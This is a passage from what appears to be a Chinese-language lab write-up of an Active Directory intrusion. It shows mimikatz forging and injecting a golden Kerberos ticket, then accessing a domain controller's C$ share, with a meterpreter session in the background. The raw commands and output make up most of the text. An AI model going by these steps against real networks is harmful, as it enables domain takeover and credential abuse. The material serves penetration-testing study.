Lifetime : 2024/6/10 3:19:58 ; 2034/6/8 3:19:58 ; 2034/6/8 3:19:58
-> Ticket : golden.kirbi* PAC generated* PAC signed* EncTicketPart generated* EncTicketPart encrypted* KrbCred generatedFinal Ticket Saved to file !mimikatz # exit
Bye!C:\x64>dir
dirVolume in drive C has no label.Volume Serial Number is B83A-92FDDirectory of C:\x642024/06/10 03:19 <DIR> .
2024/06/10 03:19 <DIR> ..
2024/06/10 03:19 1,313 golden.kirbi
2013/01/23 00:50 37,208 mimidrv.sys
2022/09/19 23:44 1,355,264 mimikatz.exe
2022/09/19 23:44 37,376 mimilib.dll
2022/09/19 23:43 10,752 mimispool.dll5 File(s) 1,441,913 bytes2 Dir(s) 6,813,360,128 bytes freeC:\x64>mimikatz.exe
mimikatz.exe.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz # kerberos::purge
Ticket(s) purge for current session is OKmimikatz # kerberos::ptt golden.kirbi* File: 'golden.kirbi': OKmimikatz # kerberos::tgt
Kerberos TGT of current session : Start/End/MaxRenew: 2024/6/10 3:19:58 ; 2034/6/8 3:19:58 ; 2034/6/8 3:19:58Service Name (02) : krbtgt ; god.org ; @ god.orgTarget Name (--) : @ god.orgClient Name (01) : hack01 ; @ god.orgFlags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 00000000000000000000000000000000Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 0 [...]** Session key is NULL! It means allowtgtsessionkey is not set to 1 **mimikatz # exit
Bye!C:\x64>dir \\owa.god.org\c$
dir \\owa.god.org\c$Volume in drive \\owa.god.org\c$ has no label.Volume Serial Number is 1E4D-1970Directory of \\owa.god.org\c$2019/10/13 13:06 <DIR> ExchangeSetupLogs
2019/08/24 21:55 <DIR> inetpub
2009/07/14 11:20 <DIR> PerfLogs
2019/08/24 21:34 <DIR> Program Files
2019/08/24 21:34 <DIR> Program Files (x86)
2019/10/13 18:01 <DIR> redis
2019/08/24 21:55 <DIR> Users
2019/10/13 16:02 <DIR> Windows0 File(s) 0 bytes8 Dir(s) 13,962,153,984 bytes freeC:\x64>whoami
whoami
stu1\hack01C:\x64>exit
exit
meterpreter > bg
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > 5. hack01使用PsExec控制域控
参考
域渗透之黄金票据与白银票据
https://www.freebuf.com/articles/others-articles/329728.html
挖个坑
2008目录下有redis,可能也能尝试通过redis的一些漏洞拿到shell,最近期末,作业好多后续有空再研究研究。
![[vulnhub]Lin.Security主机Linux提权](https://img-blog.csdnimg.cn/img_convert/3ad56ff0f87f1cb255c558799e9d9012.jpeg)
![[个人感悟] Java基础问题应该考察哪些问题?](https://img-blog.csdnimg.cn/direct/4f1be90d8bd94e90bb53fea34a12f6ae.jpeg#pic_center)
